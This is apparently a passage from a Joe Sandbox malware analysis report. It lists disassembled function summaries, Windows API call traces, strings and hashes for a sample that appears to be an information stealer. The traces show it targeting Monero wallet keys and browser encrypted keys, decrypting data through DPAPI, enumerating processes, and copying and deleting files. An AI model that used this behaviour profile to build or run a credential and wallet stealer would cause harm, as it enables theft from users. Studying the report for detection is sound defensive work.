                              • Instruction Fuzzy Hash: 6701E1B9A40208BBDB14DFE4E88DFAEB7B8FB48701F108169FA45D7284D6759A058F50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 2968fdb0571972fe161cf2eb03904d9359b2a645edfa66520c10888da3eda4b3
                              • Instruction ID: 1b2e3c2d7a24f649c3fbfcab03403f3252555603dfe5227889ac54f31c4188a2
                              • Opcode Fuzzy Hash: 2968fdb0571972fe161cf2eb03904d9359b2a645edfa66520c10888da3eda4b3
                              • Instruction Fuzzy Hash: C141C87150479C5EFB238B688D88FFB7BE89B45704F1445E8DACA861C2D2719B448F64
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 01006663
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 01006726
                              • ExitProcess.KERNEL32 ref: 01006755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: a2b9a96e5a30c39a9f75a70a9664bc182ee3a36aca1812eeff3156684437db6d
                              • Instruction ID: f6c07032da0fd8bb4c925e5ea9fc7b30513cd486b9c7208ed322b16b75aafaec
                              • Opcode Fuzzy Hash: a2b9a96e5a30c39a9f75a70a9664bc182ee3a36aca1812eeff3156684437db6d
                              • Instruction Fuzzy Hash: AE312BB1D01218AAEB15EB90EC94FDEB778AF64300F404199E34AA71C0DF746B48CF65
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01010E28,00000000,?), ref: 0100882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01008836
                              • wsprintfA.USER32 ref: 01008850
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: e7cebde52343417ca671fb558efc7f753a0619efc322b403f634781bb052e2e9
                              • Instruction ID: 88b4f9c60c6cbebdb817d179c064616879cc91bf6a42e3071f6ff05fa4cec626
                              • Opcode Fuzzy Hash: e7cebde52343417ca671fb558efc7f753a0619efc322b403f634781bb052e2e9
                              • Instruction Fuzzy Hash: 4C21FEB1A40204AFDB14DF94ED49FAEBBB8FB48711F104119F646E7284C77999018BA0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0100951E,00000000), ref: 01008D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01008D62
                              • wsprintfW.USER32 ref: 01008D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 0048ef5781aebda0162bb368ab4bd71d618091403b7029c3affba49f2d83c483
                              • Instruction ID: 042bcf8de4d2a0b737501dbc6d17d02749042b964ea0ddb17279f7141353e752
                              • Opcode Fuzzy Hash: 0048ef5781aebda0162bb368ab4bd71d618091403b7029c3affba49f2d83c483
                              • Instruction Fuzzy Hash: F4E08CB0A40208FBD720DB94E80EE6DB7B8EB04702F0000A8FD8AC7244DA719E008B91
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00FFA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00FFA6BC
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c3f120e64358bdb5db9c54d0769fa54c40a35c271bd8669baa1418003fba49d8
                              • Instruction ID: 7991543ae8e4fc5efaa0568f477d3650df9b1b2cb9caa57687ac0e50668355e6
                              • Opcode Fuzzy Hash: c3f120e64358bdb5db9c54d0769fa54c40a35c271bd8669baa1418003fba49d8
                              • Instruction Fuzzy Hash: C4E1C372A10209DAEB16EBA4DD94EEE7338AF74200F508169E557B70D0EF346B4DCB61
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFD481
                              • lstrlen.KERNEL32(00000000), ref: 00FFD698
                              • lstrlen.KERNEL32(00000000), ref: 00FFD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c4e40c005f717852c80c0b2c69e007b86b88cca21fc1d69cacb7abe766bf155d
                              • Instruction ID: b3b891fae34828d40ed32134ac691b2f92c6b24df706adbc7930845430ba4ff5
                              • Opcode Fuzzy Hash: c4e40c005f717852c80c0b2c69e007b86b88cca21fc1d69cacb7abe766bf155d
                              • Instruction Fuzzy Hash: 5B91E072A10209DBEB16FBA4DD94EEE7338AF74200F504169E597A70D0EF346B49CB61
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFD801
                              • lstrlen.KERNEL32(00000000), ref: 00FFD99F
                              • lstrlen.KERNEL32(00000000), ref: 00FFD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 4fb720379ccc98ba1f3f858da98b27c604bbbac8c01b5a41b642d127e045ccea
                              • Instruction ID: 531a1e06acdb563b5583b01dd58bfdb655c4265eb59e7caa8a36c9b6329b9223
                              • Opcode Fuzzy Hash: 4fb720379ccc98ba1f3f858da98b27c604bbbac8c01b5a41b642d127e045ccea
                              • Instruction Fuzzy Hash: 1A81F072A10209DBEB16FBA4DD94EEE7338BF64200F504129E587A70D4EF346B49DB61
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,01011580,01010D92), ref: 00FFF54C
                              • lstrlen.KERNEL32(00000000), ref: 00FFF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 41c3d39f0a185b4252460d5054c81abbf21ab409e1550c625790e865fec17980
                              • Instruction ID: 25a59d4613d301169a10105923ac51270169a210695b7c34f2f856eab942b233
                              • Opcode Fuzzy Hash: 41c3d39f0a185b4252460d5054c81abbf21ab409e1550c625790e865fec17980
                              • Instruction Fuzzy Hash: 4C51F075E10209EAEB05FBB4DC95EED7378AF64200F408528E556A71D4EF346B0DCBA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 15bccbe97bdf2c28297ce7342ef563e16cb5cd542b4dea134f329c1940763a55
                              • Instruction ID: d8fc8202320fe9319d2d36e3cdbdcf2277af6bfcdd49656d22e677c6ab3b1272
                              • Opcode Fuzzy Hash: 15bccbe97bdf2c28297ce7342ef563e16cb5cd542b4dea134f329c1940763a55
                              • Instruction Fuzzy Hash: F5416F71E10209DFEB06EFA4DC45AFEB774BB58304F008018E5966B284DB359645CFA1
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FF9D39
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9AEF
                                • Part of subcall function 00FF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B01
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9B2A
                                • Part of subcall function 00FF9AC0: LocalFree.KERNEL32(?,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B3F
                                • Part of subcall function 00FF9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF9B84
                                • Part of subcall function 00FF9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF9BA3
                                • Part of subcall function 00FF9B60: LocalFree.KERNEL32(?), ref: 00FF9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: b26cfd580e210ecf08022aa605549c5c08097fb14efac1febd1fbeeec997b083
                              • Instruction ID: eb7ce74cc4c52ee99ae32e6251bb6996a64eba5dd5b08f359821925c3a05a1f2
                              • Opcode Fuzzy Hash: b26cfd580e210ecf08022aa605549c5c08097fb14efac1febd1fbeeec997b083
                              • Instruction Fuzzy Hash: 6D315CB6D0020DABCB14EBE4DC85FFEB7B8BF48304F244519EA45A7251E7749A14CBA1
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010105B7), ref: 010086CA
                              • Process32First.KERNEL32(?,00000128), ref: 010086DE
                              • Process32Next.KERNEL32(?,00000128), ref: 010086F3
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • CloseHandle.KERNEL32(?), ref: 01008761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: d4371923d3d9b997049f2b3c4f5747b2c7c90b185a2721f3edfcbaa999cb4d60
                              • Instruction ID: c707403f209ea32126a03aa1c6325e5dc32c2796b0eceb1d3119e80b52cfb802
                              • Opcode Fuzzy Hash: d4371923d3d9b997049f2b3c4f5747b2c7c90b185a2721f3edfcbaa999cb4d60
                              • Instruction Fuzzy Hash: B1316B71A01219EBEB26DF95DC84FEEB778FB54700F0081A9E14AA7190DB306B45CFA0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01010E00,00000000,?), ref: 010079B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 010079B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,01010E00,00000000,?), ref: 010079C4
                              • wsprintfA.USER32 ref: 010079F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 524a9fa0dad4b3d5dbbed9a8fd06e651f1b552d8d05754b3d34c2bb556739394
                              • Instruction ID: 33cbd85b187c4efc99cbe320d2d257c099df3f2d28bbefd6f50551f863ecc254
                              • Opcode Fuzzy Hash: 524a9fa0dad4b3d5dbbed9a8fd06e651f1b552d8d05754b3d34c2bb556739394
                              • Instruction Fuzzy Hash: 6B113CB2904518ABCB14DFC9E949BBEB7F8FB4CB11F00421AF645A2284D3395940CBB0
                              APIs
                              • CreateFileA.KERNEL32(01003AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,01003AEE,?), ref: 010092FC
                              • GetFileSizeEx.KERNEL32(000000FF,01003AEE), ref: 01009319
                              • CloseHandle.KERNEL32(000000FF), ref: 01009327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 5479ff530256312b4ac89c3ae22a9eca054d6414c64a44944d72bbacbca4305c
                              • Instruction ID: b90f0138003739fec08c8520f451bae443db6a391afb8bd3d02de9c21a36cd57
                              • Opcode Fuzzy Hash: 5479ff530256312b4ac89c3ae22a9eca054d6414c64a44944d72bbacbca4305c
                              • Instruction Fuzzy Hash: 21F04F35E44208BBEB25DFB4EC49F9E77F9AB48710F10C2A4B695E72C5D670A6018F40
                              APIs
                              • __getptd.LIBCMT ref: 0100C74E
                                • Part of subcall function 0100BF9F: __amsg_exit.LIBCMT ref: 0100BFAF
                              • __getptd.LIBCMT ref: 0100C765
                              • __amsg_exit.LIBCMT ref: 0100C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0100C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
